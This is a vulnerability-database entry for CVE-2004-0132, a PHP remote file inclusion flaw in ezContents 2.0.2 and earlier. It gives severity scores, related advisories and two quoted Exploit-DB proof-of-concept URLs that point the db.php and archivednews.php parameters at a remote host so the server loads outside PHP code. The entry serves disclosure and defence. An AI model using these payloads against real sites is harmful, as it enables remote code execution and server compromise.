CVE-2004-0132
Published: 2004-03-03
Priority: P337 · high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.38% (81.8th percentile)
Multiple PHP remote file inclusion vulnerabilities in ezContents 2.0.2 and earlier allow remote attackers to execute arbitrary PHP code from a remote web server, as demonstrated using (1) the GLOBALS[rootdp] parameter to db.php, or (2) the GLOBALS[language_home] parameter to archivednews.php, and a malicious version of lang_admin.php.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| visualshapers | ezcontents | — | — |
GHSA
GHSA-9vjx-8hr9-q3m8: PHP remote file inclusion vulnerability in modules/calendar/minicalendar
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2008-3575 [HIGH] CWE-94
PHP remote file inclusion vulnerability in modules/calendar/minicalendar.php in ezContents CMS allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[gsLanguage] parameter, a different vector than CVE-2006-4477 and CVE-2004-0132.
GHSA
GHSA-r6cx-px2r-vrvr: Multiple PHP remote file inclusion vulnerabilities in ezContents 2
ghsa_unreviewed·2022-04-29
CVE-2004-0132 [HIGH]
Multiple PHP remote file inclusion vulnerabilities in ezContents 2.0.2 and earlier allow remote attackers to execute arbitrary PHP code from a remote web server, as demonstrated using (1) the GLOBALS[rootdp] parameter to db.php, or (2) the GLOBALS[language_home] parameter to archivednews.php, and a malicious version of lang_admin.php.
No detection rules found.
Exploit-DB
VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion
exploitdb·2004-02-11
CVE-2004-0132
---
source: https://www.securityfocus.com/bid/9638/info
It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.
This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.
http://www.example.com/[ezContents_directory]/modules/news/archivednews.php?GLOBALS[language_home]=http://www.example.com/&GLOBALS[gsLanguage]=ezContents
Exploit-DB
VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion
exploitdb·2004-02-11
CVE-2004-0132
---
source: https://www.securityfocus.com/bid/9638/info
It has been reported that ezContents may be prone to a file include vulnerability in multiple modules. The problem reportedly exists because remote users may influence the 'GLOBALS[rootdp]' and 'GLOBALS[language_home]' variables in the 'db.php' and 'archivednews.php' modules.
This vulnerability is reported to affect ezContents 2.0.2 and prior running on PHP 4.3.0 or above.
http://www.example.com/[ezContents_directory]/include/db.php?GLOBALS[rootdp]=http://www.example.com/
No writeups or analysis indexed.
Published: 2004-03-03